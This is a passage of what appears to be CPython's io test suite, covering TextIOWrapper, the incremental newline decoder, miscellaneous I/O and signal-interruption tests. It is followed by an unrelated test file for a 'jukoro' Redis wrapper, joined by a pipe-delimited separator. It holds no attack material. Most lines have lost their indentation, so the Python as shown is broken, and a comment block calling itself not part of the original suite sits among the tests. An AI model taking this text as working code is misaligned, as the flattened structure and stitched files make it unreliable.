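    txt.reconfigure(encoding='utf-8')          # implies a flush of pending text
    assert raw.getvalue() == b'abc\xe9\n'      # '\xe9' was written as latin-1
    txt.write('d\xe9f\n')
    txt.flush()
    assert raw.getvalue() == b'abc\xe9\nd\xc3\xa9f\n'  # '\xe9' is now UTF-8
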
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
return memoryview(arr)
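
# Illustrative sketch (not part of the original test suite): what
# _to_memoryview() above does to its input.  The buffer is truncated to a
# multiple of array('i').itemsize (platform dependent, usually 4 bytes) so the
# resulting memoryview has a non-trivial item size, which is why
# test_read_byteslike compares against the truncated value.
def _to_memoryview_sketch():
    import array
    payload = b'Just some random string\n'     # 25 bytes, as in the test above
    itemsize = array.array('i').itemsize
    view = _to_memoryview(payload)
    assert view.tobytes() == payload[:len(payload) - len(payload) % itemsize]
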
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "LookupError: unknown encoding: ascii"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertRaises(ValueError, t.__init__, b, encoding="utf-8", newline='xyzzy')
self.assertRaises(ValueError, t.read)
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with warnings_helper.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(os_helper.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(os_helper.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
def test_del__CHUNK_SIZE_SystemError(self):
t = self.TextIOWrapper(self.BytesIO(), encoding='ascii')
with self.assertRaises(AttributeError):
del t._CHUNK_SIZE
def test_internal_buffer_size(self):
# bpo-43260: TextIOWrapper's internal buffer should not store
# data larger than chunk size.
chunk_size = 8192 # default chunk size, updated later
class MockIO(self.MockRawIO):
def write(self, data):
if len(data) > chunk_size:
raise RuntimeError
return super().write(data)
buf = MockIO()
t = self.TextIOWrapper(buf, encoding="ascii")
chunk_size = t._CHUNK_SIZE
t.write("abc")
t.write("def")
        # The default chunk size is 8192 bytes, so t does not write data to buf yet.
self.assertEqual([], buf._write_stack)
with self.assertRaises(RuntimeError):
t.write("x"*(chunk_size+1))
self.assertEqual([b"abcdef"], buf._write_stack)
t.write("ghi")
t.write("x"*chunk_size)
self.assertEqual([b"abcdef", b"ghi", b"x"*chunk_size], buf._write_stack)
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
shutdown_error = "LookupError: unknown encoding: ascii"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
self.assertRaises(TypeError, decoder.setstate, 42)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
def test_translate(self):
# issue 35062
for translate in (-2, -1, 1, 2):
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate)
self.check_newline_decoding_utf8(decoder)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=0)
self.assertEqual(decoder.decode(b"\r\r\n"), "\r\r\n")
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
os_helper.unlink(os_helper.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertIsNotNone(obj, name)
if name in ("open", "open_code"):
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(os_helper.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(os_helper.TESTFN, "w+", encoding="utf-8")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_removed_u_mode(self):
# bpo-37330: The "U" mode has been removed in Python 3.11
for mode in ("U", "rU", "r+U"):
with self.assertRaises(ValueError) as cm:
self.open(os_helper.TESTFN, mode)
self.assertIn('invalid mode', str(cm.exception))
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_open_pipe_with_append(self):
# bpo-27805: Ignore ESPIPE from lseek() in open().
r, w = os.pipe()
self.addCleanup(os.close, r)
f = self.open(w, 'a', encoding="utf-8")
self.addCleanup(f.close)
# Check that the file is marked non-seekable. On Windows, however, lseek
# somehow succeeds on pipes.
if sys.platform != 'win32':
self.assertFalse(f.seekable())
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
f = self.open(os_helper.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
self.assertRaises(ValueError, f.read1)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
if hasattr(f, "readinto1"):
self.assertRaises(ValueError, f.readinto1, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.readlines, 1)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(os_helper.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(os_helper.TESTFN, "w", encoding="utf-8") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(os_helper.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(os_helper.TESTFN, "wb")
self._check_warn_on_dealloc(os_helper.TESTFN, "w", encoding="utf-8")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings_helper.check_no_resource_warning(self):
open(r, *args, closefd=False, **kwargs)
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r", encoding="utf-8")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
if "b" not in kwargs["mode"]:
kwargs["encoding"] = "utf-8"
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(os_helper.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipIf(
support.is_emscripten, "fstat() of a pipe fd is not supported"
)
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
@unittest.skipUnless(hasattr(os, 'set_blocking'),
'os.set_blocking() required for this test')
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
os.set_blocking(r, False)
os.set_blocking(w, False)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertEqual(sent, received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if file is existing
with self.open(os_helper.TESTFN, 'w', encoding="utf-8"):
pass
self.assertRaises(FileExistsError, self.open, os_helper.TESTFN, 'x', encoding="utf-8")
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(os_helper.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(os_helper.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, os_helper.TESTFN, 'rwax+', encoding="utf-8")
def test_check_encoding_errors(self):
# bpo-37388: open() and TextIOWrapper must check encoding and errors
# arguments in dev mode
mod = self.io.__name__
filename = __file__
invalid = 'Boom, Shaka Laka, Boom!'
code = textwrap.dedent(f'''
import sys
from {mod} import open, TextIOWrapper
try:
open({filename!r}, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(21)
try:
open({filename!r}, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(22)
fp = open({filename!r}, "rb")
with fp:
try:
TextIOWrapper(fp, encoding={invalid!r})
except LookupError:
pass
else:
sys.exit(23)
try:
TextIOWrapper(fp, errors={invalid!r})
except LookupError:
pass
else:
sys.exit(24)
sys.exit(10)
''')
proc = assert_python_failure('-X', 'dev', '-c', code)
self.assertEqual(proc.rc, 10, proc)
def test_check_encoding_warning(self):
# PEP 597: Raise warning when encoding is not specified
# and sys.flags.warn_default_encoding is set.
mod = self.io.__name__
filename = __file__
code = textwrap.dedent(f'''\
import sys
from {mod} import open, TextIOWrapper
import pathlib
with open({filename!r}) as f: # line 5
pass
pathlib.Path({filename!r}).read_text() # line 8
''')
proc = assert_python_ok('-X', 'warn_default_encoding', '-c', code)
warnings = proc.err.splitlines()
self.assertEqual(len(warnings), 2)
self.assertTrue(
warnings[0].startswith(b"<string>:5: EncodingWarning: "))
self.assertTrue(
warnings[1].startswith(b"<string>:8: EncodingWarning: "))
def test_text_encoding(self):
# PEP 597, bpo-47000. io.text_encoding() returns "locale" or "utf-8"
# based on sys.flags.utf8_mode
code = "import io; print(io.text_encoding(None))"
proc = assert_python_ok('-X', 'utf8=0', '-c', code)
self.assertEqual(b"locale", proc.out.strip())
proc = assert_python_ok('-X', 'utf8=1', '-c', code)
self.assertEqual(b"utf-8", proc.out.strip())
@support.cpython_only
# Depending if OpenWrapper was already created or not, the warning is
# emitted or not. For example, the attribute is already created when this
# test is run multiple times.
@warnings_helper.ignore_warnings(category=DeprecationWarning)
def test_openwrapper(self):
self.assertIs(self.io.OpenWrapper, self.io.open)
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
def check_daemon_threads_shutdown_deadlock(self, stream_name):
# Issue #23309: deadlocks at shutdown should be avoided when a
# daemon thread and the main thread both write to a file.
code = """if 1:
import sys
import time
import threading
from test.support import SuppressCrashReport
file = sys.{stream_name}
def run():
while True:
file.write('.')
file.flush()
crash = SuppressCrashReport()
crash.__enter__()
# don't call __exit__(): the crash occurs at Python shutdown
thread = threading.Thread(target=run)
thread.daemon = True
thread.start()
time.sleep(0.5)
file.write('!')
file.flush()
""".format_map(locals())
res, _ = run_python_until_end("-c", code)
err = res.err.decode()
if res.rc != 0:
# Failure: should be a fatal error
pattern = (r"Fatal Python error: _enter_buffered_busy: "
r"could not acquire lock "
r"for <(_io\.)?BufferedWriter name='<{stream_name}>'> "
r"at interpreter shutdown, possibly due to "
r"daemon threads".format_map(locals()))
self.assertRegex(err, pattern)
else:
self.assertFalse(err.strip('.!'))
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stdout_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stdout')
@threading_helper.requires_working_threading()
def test_daemon_threads_shutdown_stderr_deadlock(self):
self.check_daemon_threads_shutdown_deadlock('stderr')
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
        #   because a wio.close() that fails still considers that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.collect() seems to be enough to
# work around all these issues.
support.gc_collect() # For PyPy or other GCs.
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
large_data = item * (support.PIPE_MAX_SIZE // len(item) + 1)
try:
wio = self.io.open(w, **fdopen_kwargs)
if hasattr(signal, 'pthread_sigmask'):
# create the thread with SIGALRM signal blocked
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
t.start()
signal.pthread_sigmask(signal.SIG_UNBLOCK, [signal.SIGALRM])
else:
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError, wio.write, large_data)
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
@requires_alarm
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
@requires_alarm
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
signal.alarm(0)
wio.close()
os.close(r)
@requires_alarm
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
@requires_alarm
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
signal.alarm(0)
rio.close()
os.close(w)
os.close(r)
@requires_alarm
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
@requires_alarm
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r", encoding="latin1")
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = import_helper.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
error = None
def _read():
try:
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
except BaseException as exc:
nonlocal error
error = exc
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
large_data = item * N
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
written = wio.write(large_data)
self.assertEqual(N, written)
wio.flush()
write_finished = True
t.join()
self.assertIsNone(error)
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
signal.alarm(0)
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
@requires_alarm
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
@requires_alarm
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(loader, tests, pattern):
tests = (CIOTest, PyIOTest, APIMismatchTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead,
SlowFlushRawIO)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = loader.suiteClass()
for test in tests:
suite.addTest(loader.loadTestsFromTestCase(test))
return suite
if __name__ == "__main__":
unittest.main()
|
test_redis.py
|
# -*- coding: utf-8 -*-
import threading
import time
import unittest
from jukoro import redis
URI = 'redis://localhost/2'
NS = 'JuTest'
TTL = 1
class Base(unittest.TestCase):
db = None
@classmethod
def setUpClass(cls):
cls.db = redis.RedisDb(URI, ns=NS)
class TestRedisDb(Base):
def test_key(self):
self.assertEqual(self.db.key('a'), 'JuTest:a')
def test_set_get(self):
db = self.db
key, val = self.db.key('a'), 'TV'
db.set(key, val)
self.assertEqual(val, db.get(key))
db.delete(key)
self.assertNotEqual(val, db.get(key))
def test_expire(self):
db = self.db
key, val = self.db.key('a'), 'TV'
db.set(key, val, ex=TTL)
self.assertEqual(val, db.get(key))
time.sleep(TTL)
self.assertNotEqual(val, db.get(key))
class TestRedisLock(Base):
def test_no_wait(self):
db = self.db
key = 'write:lock'
lock_a = redis.RedisLock(db, key)
with lock_a:
lock_b = redis.RedisLock(db, key)
self.assertRaises(redis.AlreadyLocked, lock_b.acquire)
def test_wait_ok(self):
db = self.db
key = 'wl'
self.assertNotEqual(db.get(db.key('a')), '2015')
lock = redis.RedisLock(db, key, ttl=2, wait=True)
def lock_and_set():
db = redis.RedisDb(URI, ns=NS)
key = 'wl'
with redis.RedisLock(db, key):
db.set(db.key('a'), '2015')
time.sleep(1.5)
task = threading.Thread(target=lock_and_set)
task.daemon = True
task.start()
time.sleep(.1) # delay to allow thread to start
with lock:
v = db.get(db.key('a'))
self.assertEqual(v, '2015')
db.delete(db.key('a'))
def test_wait_failed(self):
db = self.db
key = 'wl2'
db.delete(db.key('b'))
lock = redis.RedisLock(db, key, ttl=2, wait=True)
def lock_and_set():
db = redis.RedisDb(URI, ns=NS)
key = 'wl2'
with redis.RedisLock(db, key):
db.set(db.key('b'), '2015')
time.sleep(3.5)
db.delete(db.key('b'))
task = threading.Thread(target=lock_and_set)
task.daemon = True
task.start()
time.sleep(.1) # delay to allow thread to start
def get_val():
with lock:
db.get(db.key('b'))
self.assertRaises(redis.AlreadyLocked, get_val)
class TestRedisCache(Base):
def test_ns(self):
db = self.db
cache = redis.RedisCache(db)
self.assertTrue(cache.ns.startswith('JuTest:cache'))
